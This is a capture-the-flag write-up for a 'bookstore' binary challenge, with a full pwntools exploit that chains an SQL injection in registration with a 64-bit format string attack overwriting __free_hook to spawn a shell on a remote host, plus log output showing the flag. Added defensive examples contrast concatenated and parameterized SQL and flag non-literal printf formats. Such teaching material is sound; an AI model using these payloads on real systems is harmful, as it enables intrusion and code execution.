Summary
- SQL injection
- 64-bit format string bug
Analysis
The register path does not filter the ' character, so SQL injection is possible there (the login path does filter it).
Using that injection to set point to the value the condition requires makes the FSB reachable.
From there it is a plain 64-bit FSB exploit.
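The root cause above is a query built from unfiltered user input in one code path while another path is filtered. The following added example (my own illustration, not code from the challenge; the users table schema and column names are assumptions) reproduces the register step against an in-memory SQLite database with the exact name string from the write-up, once with string concatenation and once with a parameterized query, so the difference in what ends up stored is visible:

```python
import sqlite3

# Constructed schema standing in for the challenge's user table; the real
# column names are not on the page, so these are assumptions.
SCHEMA = "CREATE TABLE users (name TEXT, password TEXT, point INTEGER DEFAULT 0)"

# The name the write-up sends during registration: it closes the string
# literal, supplies its own password and point, and comments out the rest.
INJECTED_NAME = "asdf', 'asdf', 2000000000); --"


def register_concat(db, name, password):
    """Vulnerable form: the INSERT is assembled by concatenation, with no
    quote filtering, which is how the write-up describes the register path."""
    query = ("INSERT INTO users (name, password, point) VALUES ('"
             + name + "', '" + password + "', 0)")
    # executescript accepts the trailing '--' comment that the injection leaves
    db.executescript(query)


def register_param(db, name, password):
    """Hardened form: the values travel as bound parameters, so quotes in the
    name are data, never SQL."""
    db.execute("INSERT INTO users (name, password, point) VALUES (?, ?, 0)",
               (name, password))


def stored_row(db):
    return db.execute("SELECT name, password, point FROM users").fetchone()


def demo():
    """Returns (row stored by the vulnerable path, row stored by the safe path)."""
    vuln_db = sqlite3.connect(":memory:")
    vuln_db.execute(SCHEMA)
    register_concat(vuln_db, INJECTED_NAME, "pw")

    safe_db = sqlite3.connect(":memory:")
    safe_db.execute(SCHEMA)
    register_param(safe_db, INJECTED_NAME, "pw")

    return stored_row(vuln_db), stored_row(safe_db)


if __name__ == "__main__":
    vuln, safe = demo()
    print("concatenated query stored:", vuln)   # attacker-chosen point value
    print("parameterized query stored:", safe)  # whole string kept as the name
```

With concatenation the row carries the attacker's point value; with bound parameters the entire injected string is simply the account name and point stays at its default. Filtering quotes only in login, as the challenge did, leaves every other query path exposed, which is why binding parameters everywhere is the fix rather than input filtering in one place.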
Exploit
Overwriting the GOT did not get a shell, so I overwrote __free_hook instead.
```python
from pwn import *

#s = process("bookstore")
s = remote("13.124.117.126", 31337)
e = ELF("bookstore")

# 1. Register: the name field is not quote-filtered, so the injected
#    values set the account's point column directly.
s.sendlineafter(": \n", "1")
s.sendlineafter(": ", "asdf', 'asdf', 2000000000); --")
s.sendlineafter(": ", "asdf")

# 2. Log in with that account.
s.sendlineafter(": \n", "2")
s.sendlineafter(": ", "asdf")
s.sendlineafter(": ", "asdf")

# 3. Leak a libc pointer through the format string bug.
s.sendlineafter(": \n", "3")
s.sendlineafter(">> \n", "2")
s.sendlineafter(": ", "%2$p")
s.recvline()
libc_base = int(s.recv(14), 16) - 0x3ed8c0
print(hex(libc_base))

one_gadget = libc_base + 0x4f322

# Split the target address into three 16-bit chunks, each written with %hn.
one_gadget_low = one_gadget & 0xffff
one_gadget_middle = (one_gadget >> 16) & 0xffff
one_gadget_high = (one_gadget >> 32) & 0xffff

# %<n>c pads the running character count; the differences below are the
# pad sizes needed so successive counts land on each chunk (mod 0x10000).
low = one_gadget_low
if one_gadget_middle > one_gadget_low:
    middle = one_gadget_middle - one_gadget_low
else:
    middle = 0x10000 + one_gadget_middle - one_gadget_low
if one_gadget_high > one_gadget_middle:
    high = one_gadget_high - one_gadget_middle
else:
    high = 0x10000 + one_gadget_high - one_gadget_middle

payload2 = ''
payload2 += '%' + str(low) + 'c'
payload2 += '%' + '13' + '$hn'
payload2 += '%' + str(middle) + 'c'
payload2 += '%' + '14' + '$hn'
payload2 += '%' + str(high) + 'c'
payload2 += '%' + '15' + '$hn'
payload2 += 'A' * (8 - len(payload2) % 8)   # align so the pointers sit at args 13-15
print(len(payload2))

# Target: __free_hook (the GOT is not writable, the binary has Full RELRO).
k = libc_base + 0x3ed8e8
payload2 = payload2.encode()                 # bytes from here on so p64() concatenates
payload2 += p64(k)
payload2 += p64(k + 2)
payload2 += p64(k + 4)
payload2 += p64(0) * 10

#raw_input()
s.sendlineafter(">> \n", "2")
s.sendlineafter(": ", payload2)

# 4. Walk the menu until the program calls free(), which now hits the hook.
s.recvuntil(">> ")
s.sendline("3")
s.recvuntil(":")
s.sendline("4")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("")
s.recvuntil(":")
s.sendline("3")
s.sendline("1")
s.recvuntil(":")
s.sendline("0")
s.recvuntil("sell: ")
s.interactive()
```
```text
root@ubuntu:~/hacking/ctf/grandpix/pwn2# python exploit.py
[+] Opening connection to 13.124.117.126 on port 31337: Done
[*] '/root/hacking/ctf/grandpix/pwn2/bookstore'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
0x7f0746979000
40
[*] Switching to interactive mode
$ cd home/bookstore
$ cat flag
WhiteHat{d2c2652a7b0578d04bf43d7cd6eb5d9b4ed318e7}
$
```
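The format string bug exploited above exists because user input reaches the format argument of a printf-family call. Full RELRO, canary, NX and PIE (all enabled here, per the checksec output) do not remove it, they only narrow the targets, which is why the write-up ends up at __free_hook. The check that removes the bug is at the source level: the format argument must be a literal. The following added example (my own, not the challenge's code) is a lightweight version of that check, run over a few constructed C lines; a real build should additionally use the compiler's -Wformat-security warning, which this script does not replace:

```python
import re

# printf-family functions and the 0-based position of their format argument.
FORMAT_ARG_INDEX = {
    "printf": 0, "vprintf": 0,
    "fprintf": 1, "vfprintf": 1, "dprintf": 1,
    "sprintf": 1, "vsprintf": 1,
    "snprintf": 2, "vsnprintf": 2,
    "syslog": 1,
}

CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")

# Constructed C source standing in for code under review (not from the challenge).
SAMPLE = r"""char buf[128];
read(0, buf, sizeof buf);
printf(buf);                 /* user input used as the format string */
printf("%s", buf);           /* fixed: literal format, input is data */
snprintf(out, sizeof out, buf);
fprintf(stderr, "%s\n", name);
fprintf(stderr, msg);
"""


def _split_call_args(text, open_idx):
    """Split the arguments of the call whose '(' is at text[open_idx].
    Tracks parenthesis depth and string literals so commas inside them
    do not split. Returns None if the call is not closed on this line."""
    args, cur, depth, in_str = [], [], 0, False
    i = open_idx + 1
    while i < len(text):
        ch = text[i]
        if in_str:
            cur.append(ch)
            if ch == "\\" and i + 1 < len(text):   # keep escaped char with its backslash
                i += 1
                cur.append(text[i])
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            cur.append(ch)
        elif ch == "(":
            depth += 1
            cur.append(ch)
        elif ch == ")":
            if depth == 0:
                args.append("".join(cur).strip())
                return args
            depth -= 1
            cur.append(ch)
        elif ch == "," and depth == 0:
            args.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    return None


def find_format_risks(source):
    """Return (line number, function, format expression) for every
    printf-family call whose format argument is not a string literal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            args = _split_call_args(line, m.end() - 1)
            idx = FORMAT_ARG_INDEX[m.group(1)]
            if args is None or len(args) <= idx:
                continue
            fmt = args[idx]
            if not fmt.startswith('"'):
                findings.append((lineno, m.group(1), fmt))
    return findings


if __name__ == "__main__":
    for lineno, func, fmt in find_format_risks(SAMPLE):
        print(f"line {lineno}: {func}() format argument is not a literal: {fmt}")
```

On the sample the check flags lines 3, 5 and 7 and accepts lines 4 and 6, where the format is a literal and the user data is passed as a %s argument. The same rule is what turns the challenge's leak (%2$p) and write (%hn) primitives back into inert text.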